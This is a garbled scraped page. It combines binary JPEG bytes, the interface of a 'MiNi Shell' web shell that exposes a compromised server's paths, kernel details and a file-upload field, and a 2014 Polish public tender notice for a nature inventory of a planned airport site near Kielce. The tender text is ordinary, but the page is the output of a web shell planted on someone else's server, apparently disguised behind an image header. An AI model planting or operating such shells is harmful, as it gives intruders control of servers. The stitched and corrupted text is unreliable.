JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140318/90310-N-2014.html

<p class="kh_header"><b>Kielce: Inwentaryzacja  przyrodnicza terenu  projektowanego portu lotniczego Kielce, zlokalizowanego w Obicach, gm. Morawica i Grabowcu gm. Chmielnik.</b><br>
<b>Numer ogłoszenia: 90310 - 2014; data zamieszczenia: 18.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Port Lotniczy Kielce Spółka Akcyjna , ul. Szermentowskiego 5, 25-405 Kielce, woj. świętokrzyskie, tel. 0-41 343 10 66, faks 0-41 343 10 66.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.plksa.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Inwentaryzacja  przyrodnicza terenu  projektowanego portu lotniczego Kielce, zlokalizowanego w Obicach, gm. Morawica i Grabowcu gm. Chmielnik..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sporządzenie kompleksowej Inwentaryzacji  przyrodniczej gatunków roślin, zwierząt i grzybów, siedlisk przyrodniczych i siedlisk gatunków,  zbiorowisk i stanowisk roślinnych,  w tym chronionych, wraz z oceną stanu ich zachowania i tendencji rozwojowych dla  rejonu planowanego portu lotniczego w Obicach,  gm. Morawica i Grabowcu gm. Chmielnik. 
Inwentaryzacja przyrodnicza będzie wykonana w oparciu o  analizę danych kartograficznych, literaturowych i historycznych oraz dostępnych publikowanych i niepublikowanych wyników badań oraz w oparciu o przeprowadzone badania terenowe. 
Na podstawie uzyskanych wyników z badań terenowych oraz w oparciu o analizę danych literaturowych i historycznych oraz dostępnych wyników,   przygotowany zostanie Raport końcowy zawierający min.  wykazy  gatunków zwierząt, roślin, grzybów, siedlisk przyrodniczych,  zbiorowisk i stanowisk roślinnych, zidentyfikowanych  na obszarze badań z określeniem  lokalnych zasobów,  rozmieszczeniem   oraz  oceną  stanu ich zachowania i tendencji rozwojowych. 
II.3. Zakres opracowania i wymagania szczegółowe
1) Obszar objęty badaniami
Inwentaryzacją przyrodniczą należy objąć:
a) teren lotniska wyznaczony w Projekcie zagospodarowania terenu lotniska, opracowanym przez POLCONSULT  i APA  Kuryłowicz & Associates  w 2010r. 
b) dolinę rzeki Morawki i rzekę Morawkę  na odcinku przylegającym do granicy  lotniska
c) 500m pas  buforowy  wokół  terenu lotniska .
Wskazówki  na temat obszaru jakim należy objąć badania  awifauny przedstawiono  w punkcie  6) dot. metodologii badań awifauny .   
Załącznik Nr 1   do SIWZ przedstawia zasięg granic lotniska.
Jeżeli w wyniku przeprowadzonych prac przygotowawczych, przed przystąpieniem do wykonania  prac terenowych lub w trakcie tych badań, wystąpią uzasadnione przesłanki do rozszerzenia obszaru badań terenowych, Wykonawca zobowiązany jest poinformować Zamawiającego o wystąpieniu tych przesłanek i po uzyskaniu akceptacji Zamawiającego  powiększyć obszar inwentaryzacji przyrodniczej.
2) Czasookres prowadzonych badań terenowych
Prace terenowe w ramach inwentaryzacji przyrodniczej zostaną wykonane w ciągu całego roku,  tak aby objąć  wszystkie  okresy fenologiczne . 
Czasookres badań należy wydłużyć (lub przeprowadzić dodatkowe badania w adekwatnym okresie fenologicznym) w przypadku wystąpienia nietypowych zjawisk pogodowych i innych wydarzeń losowych w tym rejonie (np. susza, powódź, pożar), które mogłyby mieć wpływ na populację danego gatunku w tym rejonie. Wykonawca zobowiązany jest poinformować Zamawiającego o wystąpieniu przesłanek do wydłużenia okresu badań terenowych i po uzyskaniu akceptacji Zamawiającego  przedłużyć ten okres. 
3) Analiza dostępnych danych 
Analiza dostępnych danych powinna obejmować: 
a) analizę atlasów rozmieszczenia poszczególnych grup zwierząt i roślin Polski  w celu rozpoznania, jakie gatunki potencjalnie mogą występować w obszarze badań;
b) analizę publikowanych i niepublikowanych danych, jeśli takie będą dostępne dla obszaru badań (w tym m.in. analiza danych dostępnych w Regionalnych  Dyrekcjach Ochrony Środowiska lub innych organach ochrony środowiska, Lasach  Państwowych, Polskim Związku Wędkarskim, Polskim Związku Łowieckim,  Wojewódzkich Inspektoratach Ochrony Środowiska, dokumentacjach rybackich,  Regionalnym Zarządzie  Gospodarki Wodnej); 
c) analizę map topograficznych i ortofotomap w celu wytypowania miejsca, które powinny być objęte szczegółowymi badaniami terenowymi;
d) analizę danych literaturowych;
e) analizę dotychczas przeprowadzonych badań monitoringu przedrealizacyjnego dla rozpatrywanej inwestycji;
f) analizę dostępnych innych badań na danym obszarze.
4) Zakres inwentaryzacji przyrodniczej
Inwentaryzacja przyrodnicza dotyczy wszystkich gatunków roślin, zwierząt i grzybów, i siedlisk przyrodniczych i siedlisk gatunków,  zbiorowisk roślinnych i  stanowisk, w tym chronionych, wraz z oceną stanu ich zachowania i tendencji rozwojowych.
Inwentaryzacji podlegać będzie: 
a)	flora roślin naczyniowych
b)	 mszaki ,
c)	 grzyby, 
d)	 porosty, 
e)	 bezkręgowce (mięczaki, owady) , 
f)	 ichtiofauna słodkowodna
g)	 herpetofauna (płazy i gady)
h)	 ornitofauna 
i)	 chiropterofauna (nietoperze)
j)	 pozostała teriofauna lądowa i wodna (ssaki lądowe i wodne)

w tym siedliska oraz gatunki roślin i zwierząt chronione,  takiej jak :
- chronione siedliska przyrodnicze h oraz gatunki roślin i  zwierząt wymienione  w Dyrektywie Rady 92/43/EEC z dnia 21 maja 1992 r. w  sprawie ochrony siedlisk  przyrodniczych oraz  dzikiej fauny i flory, ze zmianami (Dyrektywa Siedliskowa) -  załącznik II i załącznik IV, 
- ptaki wymienione  w Dyrektywie Rady 79/409/EWG z  dnia 2 kwietnia 1979 r.  w sprawie ochrony dzikich ptaków, ze zmianami (Dyrektywa Ptasia), 
-  gatunki  roślin, zwierząt i grzybów (w tym porostów) chronione prawem  krajowym (ochrona ścisła i częściowa),
-  gatunki rzadkie i zagrożone.
W stosunku do  gatunków pospolitych inwentaryzacja powinna  zwierać  ich  wykaz jednak bez podawania ich konkretnej  liczebności oraz dokładnej lokalizacji  czy opisu tendencji rozwojowych.   
W przypadku bardzo licznych grup gatunków pospolitych, można ograniczyć się do podania nazw rodzajowych, oczywiście tylko w uzasadnionych przypadkach i tylko wtedy gdy  w żaden sposób nie spowoduje to obniżenia wartości inwentaryzacji.

5) Metodologia badań - informacje ogólne
Celem Inwentaryzacji  jest zgromadzenie danych i informacji niezbędnych do opracowania raportu oddziaływania na środowisko planowanego portu lotniczego, a następnie uzyskania decyzji o środowiskowych  uwarunkowaniach realizacji inwestycji. 
Zebrane dane powinny stanowić kompletny naukowy materiał bazowy, niezbędny do określenia wpływu planowanej inwestycji na gatunki roślin, zwierząt i grzybów,  siedliska przyrodnicze i siedliska gatunków,  zbiorowiska roślinne i  stanowiska, w tym chronione.
W przypadku pominięcia w niniejszej specyfikacji  ważnych aspektów przyrodniczych dot. np. zakresu i przebiegu badań, niezbędnych do sporządzenia pełnowartościowej inwentaryzacji przyrodniczej, Wykonawca zgłosi tan fakt Zamawiającemu celem ewentualnej zmiany zakresu/kierunku czy  zasad prowadzenia/opracowania przedmiotowej inwentaryzacji. Zgłoszenie takie powinno nastąpić już na etapie opracowywania metodologii badań, przedkładanej wraz z ofertą.   
Metodologia prowadzonych badań powinna być zgodna z obowiązującymi  przepisami, z zasadami wiedzy technicznej, obowiązującymi normami,  dostępnymi wytycznymi również tymi  opracowywanymi przez środowiska naukowe oraz powinna w pełni spełniać wymogi organów wydających decyzje środowiskowe. Patrz też punkt 7).
6) Metodologia badań  awifauny 
Inwentaryzacją przyrodniczą w zakresie awifauny,  należy objąć  przestrzeń   zgodnie  ze standardami i zaleceniami Międzynarodowej Organizacji Transportu Lotniczego (Internationa Civil Aviation Organisation - ICAO), międzynarodowych organizacji do spraw kolizji ptaków ze statkami powietrznymi (International Bird Strike Committee - IBSC) oraz krajowych organizacji lotniczych jak, np. FAA (USA), TC (Transport Canada) (Kanada) oraz CAA (Civil Aviation Authority)  (Wielka Brytania) W/w standardowe wytyczne i zalecenia to :  ICAO - Konwencja z Chicago, Aneks 14, tom I, Doc 9137, 9184, 9332, IBSC Standards for Aerosdrome Bird/Wildlife Practices, CAA - CAP772, CAP168, FAA - AC150/5200-33A, TP11500E, TP1247E. 
Wymienione wyżej opracowania są autoryzowane przez Sekretarza Generalnego ICAO, stanowiąc wzorzec (wzorce), sukcesywnie implementowany do krajowych systemów prawnych w Państwach Członkowskich ICAO. Znaczna część opracowań amerykańskich (FAA), kanadyjskich i angielskich została zaakceptowana przez ICAO, stanowiąc w określonych uwarunkowaniach prawnych dodatkowe materiały doradcze lub poglądowe. 
Rozmieszczenie stref bezpieczeństwa wokół lotnisk i związanego z nim potencjalnego ryzyka kolizji poza terenami samego lotniska, rozpatrywane są w wielu opracowaniach i wystąpieniach dotyczących kolizji ptaków ze statkami powietrznymi (Battistoni 2007, Cleary, Dickey 2010, Dolbeer 2010, Klope i in. 2009, Sowden i in. 2007, Transport Canada 2002, 2004, 2005, Kelly, Allan 2006, Komenda - Zehned 2003).
W Zał. Nr 2 do SIWZ przedstawiono  przykładową literaturę  ( wykaz otwarty)  do wykorzystania w pracach inwentaryzacyjnych.
7) Opracowana przez oferentów  Metodologia badań terenowych stanowić będzie jedno z kryteriów oceny ofert.  Metodologia badań stanowi integralną część oferty..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Prace uzupełniające przedmiot zamówienia do 10 % wartości zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.70.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 13.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Przedłożenie  Wykazu  prac  wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zawierający co najmniej 3 opracowania , tj. :
-  jedną inwentaryzację przyrodniczą o zakresie zbliżonym do inwentaryzacji objętej niniejszym zamówieniem i dwa  raporty oddziaływania przedsięwzięcia na środowisko lub 
-  dwie inwentaryzacje przyrodnicze, w tym jedna o zakresie zbliżonym do inwentaryzacji objętej niniejszym zamówieniem i jeden   raport oddziaływania przedsięwzięcia na środowisko lub
- trzy inwentaryzacje przyrodnicze , w tym jedna o zakresie zbliżonym do inwentaryzacji objętej niniejszym zamówieniem.
Wartość wymaganych  opracowań nie może być niższa niż   50 000 złotych brutto każda. Wykaz zawierać będzie wyszczególnienie przedmiotu opracowania,  jego wartość, datę wykonania i  nazwę zamawiającego.  Zał. Nr 3 do SIWZ.
W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składają  Wykonawcy wspólnie.
2. Przedłożenie referencji lub innych dokumentów  (minimum trzech) potwierdzających, że prace wymienione w punkcie 1.  zostały wykonane należycie,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedłożenie Wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą brały udział w realizacji zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia a także przewidywanego zakresu wykonywanych przez nich czynności przy realizacji niniejszego zamówienia. Wykaz osób powinien zawierać  osoby o poniższych kwalifikacjach  . Osoby te powinny sprawować  podaną poniżej   funkcję w trakcie co najmniej jednego  badania terenowego:
a)	 ornitolog;
b)	 teriolog;
c)	 herpetolog;
d)	 entomolog;
e)	 botanik.
W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składają  Wykonawcy wspólnie. Zał. nr 4  do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie opłaconej polisy, lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 100 000 złotych (słownie: sto tysięcy złotych). 
W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden z Wykonawców lub mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 100 000,00 PLN (słownie: sto tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Zaproponowana metodologia prowadzonych badań terenowych - 20</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.plksa.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 25-495 Kielce, ul. Szermentowskiego 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2014 godzina 14:00, miejsce: Spółka Port Lotniczy Kielce S.A.
ul. Szermentowskiego 5, 25-405 Kielce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com